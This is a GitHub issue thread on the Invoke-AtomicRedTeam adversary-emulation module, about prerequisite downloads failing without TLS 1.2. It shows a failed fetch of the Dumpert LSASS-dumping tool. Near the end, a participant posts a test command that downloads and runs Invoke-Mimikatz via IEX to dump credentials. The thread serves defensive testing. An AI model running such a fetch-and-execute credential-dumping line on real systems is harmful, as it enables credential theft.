search

redcanaryco / invoke-atomicredteam

Invoke-AtomicRedTeam is a PowerShell module to execute tests as defined in the [atomics folder](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics) of Red Canary's Atomic Red Team project.
MIT License
818 stars 194 forks source link

Add support for TLS 1.2 in PowerShell when getting prereq #34

Closed cnotin closed 4 years ago

cnotin commented 4 years ago

I added it in #30 for when Invoke-WebRequestVerifyHash is used, however many tests simply use Invoke-WebRequest from PowerShell to download their prereq files. GitHub on its github.com now requires TLS 1.2 which prevents download for example:

PS C:\windows\system32> Invoke-AtomicTest T1003 -TestNumbers 7 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

GetPrereq's for: T1003-7 Dump LSASS.exe Memory using direct system calls and API unhooking
Attempting to satisfy prereq: Dumpert executable must exist on disk at specified location (C:\AtomicRedTeam\atomics\T100
3\bin\Outflank-Dumpert.exe)
Invoke-WebRequest : The request was aborted: Could not create SSL/TLS secure channel.
At line:2 char:1
+ Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebExc
   eption
    + FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

Failed to meet prereq: Dumpert executable must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1003\bin\O
utflank-Dumpert.exe)

I tried adding the following in the .psm1 file but it doesn't look like to be sufficient:

[Net.ServicePointManager]::SecurityProtocol = ([Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls12)

Which is normal considering that it seems that a child powershell.exe is launched, so different context! I don't know very much the code so I don't know where we could inject it the best to ensure it applies to most of the code :)

A short term solution could be using raw.githubusercontent.com links (which still accepts TLS 1.0 and 1.1) instead of https://github.com//Dumpert/raw... but let's do better ;)

cnotin commented 4 years ago

We have the SchUseStrongCrypto registry key which applies these settings to all .net app, but it's under HKLM so it requires admin and I don't think it's a prerequisite for Invoke-ART so that might not do the trick...

clr2of8 commented 4 years ago

We've decided to address this by updated the atomics themselves (the yaml files within the other github repo). This way the fix works for any/all execuction frameworks. You will see several PR's from Scoubi adding the fix in over there. thx

cnotin commented 4 years ago

It works too :)

WinterIsCommin commented 3 years ago

@clr2of8 , Did he fixed the issues ? , because I'm going trough the same issue now..

cnotin commented 3 years ago

@WinterIsCommin which test in particular?

WinterIsCommin commented 3 years ago

@cnotin Powershell - FileLess - T1059.001, test 1 & 3 for now.

cnotin commented 3 years ago

Indeed it's missing the necessary code

WinterIsCommin commented 3 years ago

@cnotin Fixed it by adding the following command before the web request For Example, file T1059.001.yaml

executor: command: | powershell.exe "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12" ; "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"

cnotin commented 3 years ago

That's the idea :) Actually this test could be modified to use the "powershell" executor instead of command_prompt to then call powershell.exe

You can submit a PR if you want